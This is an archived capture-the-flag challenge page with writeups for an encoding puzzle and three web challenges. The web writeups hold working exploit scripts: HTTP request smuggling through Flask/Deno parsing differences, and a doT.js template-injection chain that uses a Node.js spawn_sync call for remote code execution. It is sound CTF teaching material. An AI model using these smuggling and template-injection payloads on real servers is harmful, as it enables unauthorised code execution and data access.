Archived Challenges - December 2024

misc

Round 52 Sanity Check (15pts) - 02/12

Description

welcome to round 52!!!!!

Attachments

ictf{w31c0me_t0-r0unD_52!??!?}

Writeup

The lowercase 'w' in the description hints that it may be the key to finding the flag. Replacing spaces with underscores, we get 'welcome_to_round_52!!!!!'. Consider 'hi\r' (with a carriage return) in binary, '011010000110100100001101'. Line these two 24-character strings up, and modify a character in the description if it lines up with a 1, changing letters to digits if possible, switching their case otherwise, and changing exclamation points to question marks à la interrobang. ``` welcome_to_round_52!!!!! 011010000110100100001101 w31c0me_t0-r0unD_52!??!?

Flag

ictf{w31c0me_t0-r0unD_52!??!?}

selfies (75pts) - 04/12

Insanity Check (-1pts) - 29/12

Crypto

Analyze (50pts) - 03/12

Affine Padding (75pts) - 06/12

mosaic revenge (175pts) - 09/12

On The Edge (100pts) - 18/12

RS-Survey (125pts) - 19/12

Fencing (50pts) - 20/12

Cold Case (75pts) - 22/12

Soup or Salad (65pts) - 26/12

RSARSA (100pts) - 28/12

web

proxy confusion (75pts) - 05/12

Description

Which web server would you like?

Attachments

http://155.248.210.243:42188/ https://cybersharing.net/s/930065a24e3cd5cb1bf7b4520616af2d

Writeup

When 2 requests are sent in the same socket connection without Content-Length, flask ignores the second one while deno treat it as a next request.

from pwn import *

io = remote("localhost", 4000)
io.send(b"""
GET / HTTP/1.1

GET /flag HTTP/1.1
        """.strip().replace(b"\n", b"\r\n") + b"\r\n\r\n")

r = io.recv()
print(r.decode())

Flag

ictf{fl45k_54y5_n0_bu7_d3n0_54y5_y35}

proxy confusion revenge (100pts) - 24/12

Description

I hope my flask server protects my flag this time!

Attachments

http://155.248.210.243:42176/ https://cybersharing.net/s/d6e7c2e391aa8019859d483f75e45518

Writeup

Werkzeug only processes the Transfer-Encoding header if it is exactly "chunked". Otherwise it's ignored and Content-Length header is used (default 0) https://github.com/pallets/werkzeug/blob/5add63c955131fd73531d7369f16b2f1b4e342d4/src/werkzeug/sansio/utils.py#L140

On the other hand, hyper accepts comma-seperated values, as long as the last value is "chunked". (This is the expected behavior in RFC) https://github.com/hyperium/hyper/blob/c68d42444ea6b930cb75907336150d2baf58a7e8/src/headers.rs#L130

You can abuse this to make the body only valid for deno.

from pwn import *

io = remote("localhost", 4000)
io.send(b"""
POST /flag HTTP/1.1
Transfer-Encoding: foobar, chunked

15
please give me flag

0
        """.strip().replace(b"\n", b"\r\n") + b"\r\n\r\n")

r = io.recvall(timeout=1)
print(r.decode())

Flag

ictf{cl_54y5_570p_bu7_73_54y5_60_60_60}

Hello from 2025! (100pts) - 30/12

Description

Happy new year! Please test on your local machine before attempting on remote.

Attachments

http://155.248.210.243:42137/ https://cybersharing.net/s/93caff32be845dd127fe28de05b5a275 edit: http://35.202.133.120:1337/ new instance for last few hrs

Writeup

The Buffer.from method in Node.js accepts various argument types. Although it's not explicitly documented, one format it supports is:

// <Buffer 61 62 63>
Buffer.from({
    type: "Buffer",
    data: [0x61, 0x62, 0x63]
})

(See: https://github.com/nodejs/node/blob/413975a580429585fbbf1e6d3bf55179b2b1e075/lib/buffer.js#L537) Using the /now endpoint, we can determine the format for new Date().toString(). This allows us to create an object for Buffer.from(user) that matches the output of Buffer.from(new Date('2025-01-01T00:00:00')).

With this setup, we can trigger SSTI in doT.js. doT.js templates support arbitrary code execution with the {{<expression>}} syntax. However, {{, and }} are restricted.

Examining the doT.js code, we see that /*...*/ are removed before processing. This means we can bypass the restriction using {/**/{<expression>}/**/}

To execute a function without using ( or ), override escapeHTML by {{=escapeHTML=eval}}and call it by {{!it.x}}.

https://github.com/olado/doT/blob/031d3bb7520eed6b93886df2b650b7fce12a7007/doT.js#L98

This allows for RCE. Here's the full exploit.

import requests

URL = "http://localhost:1337/"

r = requests.get(URL + "now")
print(r.text)

cmd = 'cat /flag-*'
data = {
    "type": "Buffer",
    "data": list("Wed Jan 01 2025 00:00:00 GMT+0000 (Coordinated Universal Time)".encode()), 
    "template": "{/**/{=encodeHTML=eval}/**/}{/**/{!it.x}/**/}",
    "x": """process.binding('spawn_sync').spawn({
    file: 'bash',
    args: ['bash','-c', '%s'], 
    stdio: [
        { type: 'pipe', readable: true, writable: true },
        { type: 'pipe', readable: true, writable: true }
    ],
}).output + ''""" % cmd
}
r = requests.post(URL, json=data)
print(r.text)

Flag

ictf{d1d_u_kn0w_7h47_2025==45^2???}

Rev

Lucky (75pts) - 21/12

GPGPU (100pts) - 23/12

Christmas Miracle (115pts) - 25/12

IEEE-754 (50pts) - 27/12

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44